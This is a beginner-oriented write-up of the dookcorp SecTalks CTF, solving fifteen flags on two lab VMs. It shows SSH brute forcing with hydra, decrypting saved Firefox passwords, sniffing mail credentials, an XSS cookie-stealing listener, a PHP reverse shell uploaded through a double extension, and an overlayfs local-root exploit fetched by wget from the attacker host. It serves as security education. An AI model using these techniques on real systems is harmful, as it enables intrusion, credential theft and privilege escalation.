dookcorp!… BNE0x09 CTF
Recently I was privileged to be a tester for a new CTF created by @dookwit for the Sectalks Brisbane meetups. This write-up will be a little long in the tooth for seasoned CTF folk, however my goal is to write this for a beginner audience in order to share entry level enumeration techniques and general tool usage.
Description:
Hi fellow SecTalkers! Welcome to my first SecTalks CTF....dookcorp!
This is a Boot2Root(Kinda) which also has a Jeopardy style too (So lots of flags to submit to a scoreboard).
CTF Level (Beginner-Medium)
===========================
Always hard to gauge...i think some people will smash through it fairly quickly.
But the idea is to learn something, so hopefully some people will learn some new tricks.
VM Setup
========
Theres 2 OVA's (Server and Desktop)
They were both built in VirtualBox (so no clue if it'll work nicely on VMWare)
They both have static IP addresses in the 192.168.56.0/24 range (VirtualBox default Host only network)
Import em...make sure the networks are sorted, turn em on, and confirm you can see/find their IP addresses
Start hacking!
Note - Err...there appears to be a slight delay in the web server starting up. Give it upto 5mins just incase....opps...spoiler..theres a web server ;)
Flags
=====
All flags are random MD5 hashes and are in the format "flag{abcdef1234567890}".
There are a total of 15 flags to find.
Let’s get started! First up, find the IP addresses of our guest VMs ‘Server’ and ‘Desktop’…..
1 2 3 4 5 6 7 8 |
Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.50 08:00:27:04:e1:c4 1 60 Cadmus Computer Systems 192.168.56.60 08:00:27:35:94:b9 1 60 Cadmus Computer Systems |
… and take a look at what services are listening.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
root@omerta:~/offsec/ctf/dookcorp# nmap -n -Pn -A -p- 192.168.56.50 Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-03 14:21 AEST Nmap scan report for 192.168.56.50 Host is up (0.00042s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 51:2a:d0:d2:dc:af:52:a4:30:dd:ea:ee:20:ac:a2:7a (DSA) | 2048 1c:02:a4:dc:58:14:78:c8:f6:3b:f2:41:30:80:3c:e9 (RSA) |_ 256 ba:33:fd:1c:08:24:81:fb:d3:45:cf:0d:01:86:e6:a8 (ECDSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: mailserver.dookcorp.awesome, PIPELINING, SIZE 10240000, VRFY, ETRN, AUTH PLAIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.4.10 ((Ubuntu)) |_http-server-header: Apache/2.4.10 (Ubuntu) |_http-title: Welcome to dookCORP 143/tcp open imap Dovecot imapd (Ubuntu) |_imap-capabilities: ID more Pre-login LITERAL+ IDLE have post-login ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS listed capabilities IMAP4rev1 SASL-IR OK |_imap-ntlm-info: ERROR: Script execution failed (use -d to debug) MAC Address: 08:00:27:04:E1:C4 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Network Distance: 1 hop Service Info: Host: mailserver.dookcorp.awesome; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.42 ms 192.168.56.50 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds |
‘mailserver.dookcorp.awesome’.. I think it’s safe to assume that 192.168.56.50 is our server.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
root@omerta:~/offsec/ctf/dookcorp# nmap -n -Pn -A -p- 192.168.56.60 Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-03 14:22 AEST Nmap scan report for 192.168.56.60 Host is up (0.00035s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.9p1 Ubuntu 2ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 f2:a1:d9:8d:98:7c:b1:13:7e:f6:84:ee:f5:df:e3:6f (DSA) | 2048 44:20:8d:c7:e4:be:b7:70:87:9f:a4:1c:14:65:07:35 (RSA) |_ 256 fc:3f:4d:0a:91:0e:8a:14:a4:5d:9e:14:f8:68:55:16 (ECDSA) MAC Address: 08:00:27:35:94:B9 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.4 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.35 ms 192.168.56.60 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds |
Personally I always like to start with the low hanging fruit, which, in this case, is port 80. Let’s take a look.
Flag 1
Nothing too obvious there.. so let’s take a look at the source code.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
root@omerta:~/offsec/ctf/dookcorp# curl -s 192.168.56.50 <html> <head> <title> Welcome to dookCORP </title> </head> <body> <center> <img src="dookcorp.jpg"> </body> </html> <!--Flag1 = flag{MD5_REDACTED} --> |
Voila.. Flag1 straight up and that gets us points on the board!
Flag 2
Still working with our low hanging fruit, the web service, let’s try to enumerate (fuzz) any other directories or files which may exist. Personal tool of choice, OJ’s Gobuster.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
root@omerta:~/offsec/ctf/dookcorp# gobuster-git -w /usr/share/wordlists/seclists/Discovery/Web_Content/big.txt -u 192.168.56.50/ ===================================================== Gobuster v1.0 (DIR support by OJ Reeves @TheColonial) (DNS support by Peleus @0x42424242) ===================================================== [+] Mode : dir [+] Url/Domain : http://192.168.56.50/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/seclists/Discovery/Web_Content/big.txt [+] Status codes : 200,204,301,302,307 ===================================================== /company (Status: 301) /robots.txt (Status: 200) ===================================================== |
Great! A directory and a file to look at. Let’s take a look at the robots.txt file to discover any other files or directories which may exist.
1 2 |
root@omerta:~/offsec/ctf/dookcorp# curl -s 192.168.56.50/robots.txt Flag2 = flag{MD5_REDACTED} |
Sweet! Flag2 found.
Flag 3
What does the /company directory give us?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
root@omerta:~/offsec/ctf/dookcorp# curl -sL 192.168.56.50/company <html> <head> <title> Welcome to the dookCORP Company Portal </title> </head> <body> This is the dookCORP Company Portal <p> Flag3 = flag{MD5_REDACTED} <p> <a href="/zAzCzCzEzSzSz/accesscode.php">Flag4</a> <p> Click <a href="messageboard/">here</a> to goto the dookCORP messageboard for company notices. You'll need to login, it's probably best if you save your login details in Firefox for easy access from the Desktop machine. - dook. </body> </html> |
Nice.. another flag! We’re on a good roll!
Flag 4
We don’t need to be told twice regarding where to look for Flag4! Let’s take a look!
1 2 3 4 5 6 7 8 9 |
root@omerta:~/offsec/ctf/dookcorp# curl -isL 192.168.56.50//zAzCzCzEzSzSz/accesscode.php HTTP/1.1 200 OK Date: Tue, 03 May 2016 04:42:15 GMT Server: Apache/2.4.10 (Ubuntu) Set-Cookie: accesscode=cfcd208495d565ef66e7dff9f98764da Content-Length: 46 Content-Type: text/html; charset=UTF-8 Incorrect AccessCode!<br>You need to be 1337! |
There are a couple of interesting things to look at here. Firstly, there’s a cookie attribute called "accesscode"
, and also a hint saying that our accesscode was incorrect, we need to be 1337!
The "accesscode"
token looks to be MD5 to me. Let’s create an MD5 hash of the user string 1337 and see how the application responds.
1 2 |
root@omerta:~/offsec/ctf/dookcorp# echo -n '1337' | md5sum e48e13207341b6bffb7fb1622282247b - |
As you may have noticed by now, I’m a big fan of using the CLI when I can.
1 2 3 4 5 6 7 8 |
root@omerta:~/offsec/ctf/dookcorp# curl -isL -b "accesscode=e48e13207341b6bffb7fb1622282247b" 192.168.56.50//zAzCzCzEzSzSz/accesscode.php HTTP/1.1 200 OK Date: Tue, 03 May 2016 04:49:20 GMT Server: Apache/2.4.10 (Ubuntu) Content-Length: 47 Content-Type: text/html; charset=UTF-8 Flag4 = flag{MD5_REDACTED} |
BAM! Another flag. If you’re not a fan of using the CLI, you could use tools such as BurpSuite, TamperData, or the developer tools of your browser to get the same result. Each to their own.
Flag 5
The hint for Flag 5 is as follows:
Brute force frank on the Desktop (This is the only brute force challenge)
Once you have the password you CAN logon to the Desktop computer through the GUI
Fair enough.. let’s brute force our way onto the Desktop as ‘frank’. Looking back at our enumeration of open ports, we see that we have ports 22, 25, 80, and 143 listening. Let’s pick on the SSH port, 22.
1 2 3 4 5 6 7 8 9 10 |
root@omerta:~/offsec/ctf/dookcorp# hydra -l frank -P /usr/share/wordlists/rockyou.txt 192.168.56.60 ssh Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-03 14:58:16 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.56.60 login: frank password: 1234567 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-05-03 14:58:20 |
Too easy. Let’s login via SSH!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
root@omerta:~/offsec/ctf/dookcorp# ssh frank@192.168.56.60 The authenticity of host '192.168.56.60 (192.168.56.60)' can't be established. ECDSA key fingerprint is SHA256:YBCgV52FvoBmZW8jLEztjdmH19tqdhj40wLHwXwqUcE. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.56.60' (ECDSA) to the list of known hosts. frank@192.168.56.60's password: Welcome to Ubuntu 15.10 (GNU/Linux 4.2.0-16-generic i686) * Documentation: https://help.ubuntu.com/ Last login: Wed Apr 20 19:54:26 2016 from 192.168.56.1 frank@dookcorp-desktop:~$ pwd;ls -al /home/frank total 696 drwxr-xr-x 17 frank frank 4096 Apr 20 19:56 . drwxr-xr-x 4 root root 4096 Apr 10 16:03 .. -rw------- 1 frank frank 0 Apr 20 20:27 .bash_history -rw-r--r-- 1 frank frank 220 Apr 10 16:03 .bash_logout -rw-r--r-- 1 frank frank 3771 Apr 10 16:03 .bashrc drwx------ 14 frank frank 4096 Apr 19 17:48 .cache drwx------ 17 frank frank 4096 Apr 19 17:18 .config drwxr-xr-x 2 frank frank 4096 Apr 20 19:56 Desktop -rw-r--r-- 1 frank frank 25 Apr 10 16:04 .dmrc drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Documents drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Downloads -rw-r--r-- 1 frank frank 8980 Apr 10 16:03 examples.desktop -rw-rw-r-- 1 frank frank 47 Apr 20 19:55 Flag5.txt drwx------ 3 frank frank 4096 Apr 20 19:53 .gconf -rw------- 1 frank frank 3230 Apr 20 19:53 .ICEauthority drwx------ 3 frank frank 4096 Apr 10 16:04 .local drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Music -rw-rw-r-- 1 frank frank 593562 Apr 10 16:08 MyFireFoxProfileBackup.zip drwxrwxr-x 2 frank frank 4096 Apr 20 19:54 .nano drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Pictures -rw-r--r-- 1 frank frank 675 Apr 10 16:03 .profile drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Public drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Templates drwx------ 4 frank frank 4096 Apr 18 20:49 .thunderbird drwxr-xr-x 2 frank frank 4096 Apr 10 16:04 Videos drwxr-xr-x 2 frank frank 4096 Apr 18 21:22 .wireshark -rw------- 1 frank frank 61 Apr 20 19:53 .Xauthority -rw------- 1 frank frank 2645 Apr 20 20:27 .xsession-errors -rw------- 1 frank frank 2168 Apr 20 17:49 .xsession-errors.old frank@dookcorp-desktop:~$ |
Concatenating Flag5.txt gives us the flag.
1 2 |
frank@dookcorp-desktop:~$ cat Flag5.txt Flag5 = flag{MD5_REDACTED} |
Flag 6
Our hint for Flag 6 is “MessageBoard”. In Flag3 we had a mention of a messageboard:
1 |
Click <a href="messageboard/">here</a> to goto the dookCORP messageboard for company notices. You'll need to login, it's probably best if you save your login details in Firefox for easy access from the Desktop machine. - dook. |
Let’s take a look at the messageboard, this time in a browser just to mix it up a little bit.
The first thing I always try is a username of ‘admin’ with a password of ‘admin’, followed by some simple XSS and SQLi tests; none of which worked with quick check.
Did you see the MyFireFoxProfileBackup.zip file in frank’s home directory? Did you see the hint from Flag3 saying “it’s probably best if you save your login details in Firefox”? Let’s grab that and take a look to see if he’s saved passwords.
1 2 3 4 5 6 7 8 9 10 11 |
root@omerta:~/offsec/ctf/dookcorp# scp frank@192.168.56.60:~/MyFireFoxProfileBackup.zip . frank@192.168.56.60's password: MyFireFoxProfileBackup.zip 100% 580KB 579.7KB/s 00:00 root@omerta:~/offsec/ctf/dookcorp# unzip MyFireFoxProfileBackup.zip Archive: MyFireFoxProfileBackup.zip creating: .mozilla/ creating: .mozilla/firefox/ <redacted> inflating: .mozilla/firefox/profiles.ini <redacted> |
Looks promising! Let’s search for credentials with Unode’s Firefox Decrypt tool.
1 2 3 4 5 6 7 8 |
root@omerta:~/offsec/ctf/dookcorp# firefox_decrypt-git .mozilla/firefox/ Master Password for profile .mozilla/firefox/10r85o44.default: 2016-05-03 15:28:08,790 - WARNING - Attempting decryption with no Master Password Website: http://192.168.56.50 Username: 'frank' Password: '5QdSa0iGmKjqWVcQUBpX' |
Voila! Let’s test the creds on the messageboard.
Flag 6 complete!
Flag 7
The hint for Flag7 is “Secure Messageboard”, and the message board from Flag6 hints that the URL has been emailed to us.
"Messageboard
OK guys, some news. As this portal isn't that secure, we've created a new secret one. You don't need to login but the url is private so i've emailed it to you, hope you haven't deleted it!
If you have come see me and i'll find the email from my Sent Items (i check my email pretty regularly).
On an unrelated note, so you can do your job better i've given you access to some tools on the Desktop machine.
The tools are: ls, mkdir, WireShark and spider solitaire."
Let’s log on to the desktop and check frank’s email. Starting up Thunderbird indicates that frank doesn’t have email setup. The hint above let us know that dook checks his email regularly, and we have access to WireShark on the desktop, so let’s see if we can see any traffic.
After a short while we see dook checking his mail. Let’s follow the TCP stream to see if we can grab any creds.
BAM! We configure Thunderbird to use dook’s credentials.
In the inbox we see an email from frank to dook, with the subject of “URL”.
Looking in the Sent items we can see the email from dook to frank with the SecureMessageBoard URL.
Let’s browse to this location.
Flag7 is ours!
Flag 8
First things first.. do we have an XSS?
Our test script is accepted, and we are redirected to the Secure Messageboard with our successful XSS test executed.
One of the messages give us the hint that dook logs in constantly to check the Secure Messageboard.
Name: dook
Message:Oh...and dont be a dick! I monitor this page constantly.
Let’s create a service which will capture dook’s session cookie. If all works out well, we should be able to replay the cookie and presumably log on as an admin.
1 2 3 4 |
root@omerta:~/offsec/ctf/dookcorp# cat index.php <?php $cookie = isset($_GET["cookiemonster"])?$_GET['cookiemonster']:""; ?> |
Now.. let’s create some type of listener. You could use apache for this and just check your access logs, or, you could use a simple python module which is my preference.
1 2 |
root@omerta:~/offsec/ctf/dookcorp# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... |
And our XSS..
The message is accepted, and once the page reloads we can see our PHPSESSID being passed to our listener. All we need to do now is wait for dook to log on to check the messageboard, and we should be able to get his PHPSESSID cookie session for a replay attack.
1 2 3 4 |
root@omerta:~/offsec/ctf/dookcorp# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 192.168.56.1 - - [03/May/2016 19:47:19] "GET /index.php?cookiemonster=PHPSESSID=41r0f1urqrss7c5e9qiq0ddeh2 HTTP/1.1" 200 - 192.168.56.50 - - [03/May/2016 19:48:03] "GET /index.php?cookiemonster=PHPSESSID=d4e68177f8ba58c9724c946b0e6cbdb6 HTTP/1.1" 200 - |
Let’s revisit the page with dook’s PHP session ID.
1 2 3 4 5 6 7 8 9 |
root@omerta:~/offsec/ctf/dookcorp# curl -isL -b "PHPSESSID=d4e68177f8ba58c9724c946b0e6cbdb6" http://192.168.56.50/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/admin.php HTTP/1.1 200 OK Date: Tue, 03 May 2016 10:01:26 GMT Server: Apache/2.4.10 (Ubuntu) Vary: Accept-Encoding Content-Length: 194 Content-Type: text/html; charset=UTF-8 Welcome Admin!<br>Flag8 = flag{MD5_REDACTED}<br>File Upload is at http://192.168.56.50/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d |
Voila. Flag8 solved.
Flag 9
As per the hint in Flag8, the next step is file upload. Let’s try the obvious first by attempting to upload a PHP reverse shell.
It looks like our upload was successful, however the PHP extension has been recognised as potentially malicious. Taking a look at the /uploads
directory we can see our shell has been uploaded, sans extension.
So what happens if we simply add another .php extension to our original shell, and upload that?
Success! Our shell uploads correctly. Let’s setup a listener…
1 2 |
root@omerta-vm:~# nc -nvlp 443 listening on [any] 443 ... |
… and execute our shell.
1 2 3 4 5 6 7 8 9 10 |
root@omerta-vm:~# nc -nvlp 443 listening on [any] 443 ... connect to [192.168.56.103] from (UNKNOWN) [192.168.56.50] 43319 Linux dookcorp-server 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux 21:00:45 up 1:17, 0 users, load average: 0.00, 0.04, 0.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/sh")' $ |
We navigate back to the upload web application and grab our Flag.
1 2 3 4 5 6 7 8 9 10 11 12 |
$ cd /var/www/html/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d $ ls -al total 24 drwxr-xr-x 3 www-data www-data 4096 Apr 27 18:46 . drwxr-xr-x 3 www-data www-data 4096 Apr 20 20:14 .. -rw-r--r-- 1 www-data www-data 47 Apr 20 20:14 Flag9.txt -rw-r--r-- 1 www-data www-data 248 Apr 10 15:07 index.html -rw-r--r-- 1 www-data www-data 954 Apr 27 18:46 upload.php drwxr-xr-x 2 www-data www-data 4096 May 3 20:58 uploads $ cat Flag9.txt cat Flag9.txt Flag9 = flag{MD5_REDACTED} |
Flag 10
It’s time for some privilege escalation. Let’s take a look at what distro we’re working with.
1 2 3 |
$ uname -a ; cat /etc/issue Linux dookcorp-server 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux Ubuntu 15.04 \n \l |
Ubuntu 15.04. Let’s check if there is anything obvious listed on exploit-db.
1 2 3 4 5 6 7 8 9 10 |
root@omerta:~/offsec/ctf/dookcorp# searchsploit 15.04 ------------------------------------------------------------------------------------ ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms) ------------------------------------------------------------------------------------ ---------------------------------- Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability | ./php/webapps/3843.txt WordPress FeedWordPress Plugin 2015.0426 - SQL Injection | ./php/webapps/37067.txt Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell) | ./linux/local/37292.c Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File) | ./linux/local/37293.txt ------------------------------------------------------------------------------------ ---------------------------------- |
overlayfs Local Root exploit… that sounds promising to me. Time to download the exploit, compile it, and attempt to run it.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
$ wget 192.168.56.103/exploit.c --2016-05-03 21:19:38-- http://192.168.56.103/exploit.c Connecting to 192.168.56.103:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4966 (4.8K) [text/plain] Saving to: 'exploit.c' exploit.c 100%[=====================>] 4.85K --.-KB/s in 0s 2016-05-03 21:19:38 (724 MB/s) - 'exploit.c' saved [4966/4966] $ gcc exploit.c -o exploit $ ./exploit spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id;whoami;hostname uid=0(root) gid=0(root) groups=0(root),33(www-data) root dookcorp-server # |
BAM! Exploit success and we are now root!
Let’s look for some flags.
1 2 3 4 5 |
# find / -name Flag* /root/Flag11.txt /var/www/html/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d/Flag9.txt /var/lib/mysql/Flag10 # |
Nice.. a couple of flags there. Let’s take a look at Flag10 first.
1 2 3 4 5 6 7 8 9 |
# cd /var/lib/mysql/Flag10 cd /var/lib/mysql/Flag10 # ls db.opt flag10.frm flag10.ibd # strings flag10.ibd infimum supremum/ Flag10 = flag{MD5_REDACTED} # |
Thank you very much.. Flag10 captured.
Flag 11
Thanks to the enumeration in Flag10, Flag11 is pretty straight forward.
1 2 |
# cat /root/Flag11.txt Flag11 = flag{MD5_REDACTED} |
Flag 12
The hint for Flag 12 is ‘dook has been working on an “alternate” web server on the Desktop’. Let’s jump back to the Desktop machine and see what services are in a listening state.
Port 8080 looks interesting however it’s not directly accessible to us from the outside. We could simply telnet to the port on Desktop, however I’d like to show you a sexier way to attack this flag. What we are going to do is present Desktop’s local port 8080 to port 8080 on our attacking host via an SSH reverse tunnel.
First, we setup the reverse tunnel.
1 2 3 4 5 6 7 8 |
root@omerta:~/offsec/ctf/dookcorp# ssh -L 8080:localhost:8080 frank@192.168.56.60 frank@192.168.56.60's password: Welcome to Ubuntu 15.10 (GNU/Linux 4.2.0-16-generic i686) * Documentation: https://help.ubuntu.com/ Last login: Tue May 3 21:47:05 2016 from 192.168.56.1 frank@dookcorp-desktop:~$ |
Now let’s take a look
1 2 3 4 5 6 7 8 |
root@omerta:~/offsec/ctf/dookcorp# curl -is 127.0.0.1:8080 HTTP/1.1 200 OK Host: 127.0.0.1:8080 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49 Flag12 = flag{MD5_REDACTED} |
As easy as that.. Flag12 is ours.
Flag 13
“Frank emailed dook with this flags location.”… that’s our clue. Do you recall in Flag7 seeing an email from Frank to dook?
Let’s take a look at @dookcorp on twitter shall we.
Thanks for Flag13 @dookcorp.
Flag 14
Flag14 is a bonus flag made up of the first 2 digits of flags 1 through to 10. No need for me to got through this one with you.
Flag 15
The final flag! Our hint: “Frank has this flag on the server”.
Let’s jump back onto the server and see what we can find.
First up, does frank exist on the server?
1 2 |
# cat /etc/passwd | grep frank frank:x:1001:1001:,,,:/home/frank:/bin/bash |
He certainly does.. let’s take a look at his home directory.
1 2 3 4 5 6 7 8 9 10 |
# cd /home/frank; ls -al cd /home/frank; ls -al total 28 drwxr-xr-x 3 frank frank 4096 Apr 26 16:14 . drwxr-xr-x 4 root root 4096 Apr 10 15:32 .. -rw-rw-r-- 1 frank frank 60 Apr 20 20:33 .bash_history -rw-r--r-- 1 frank frank 220 Apr 10 15:32 .bash_logout -rw-r--r-- 1 frank frank 3760 Apr 10 15:32 .bashrc drwx------ 2 frank frank 4096 Apr 20 20:32 .cache -rw-r--r-- 1 frank frank 675 Apr 10 15:32 .profile |
Nothing obvious straight off the bat. Let’s take a look at the hidden files.
1 2 |
# grep -is flag .* .bash_history:echo "Flag15 = flag{MD5_REDACTED}" |
Cheers for Flag15 frank!
THE END
Wow! What a CTF!
For the new players in this space, I hope my overly explanatory way of writing up this CTF has helped you in some way and you have been able to learn something new.
Dook (@dookwit)!…thank you for taking the time to create such an awesome CTF, and cheers for letting me be your test bunny. Owe you a beer some time.
A big shout out to Sectalks Brisbane and all the sponsors that make each meet-up possible. If you haven’t been involved with SecTalks at this stage, do yourself a favour and come along to the next meet-up.
Until next time, tight lines and happy hacking.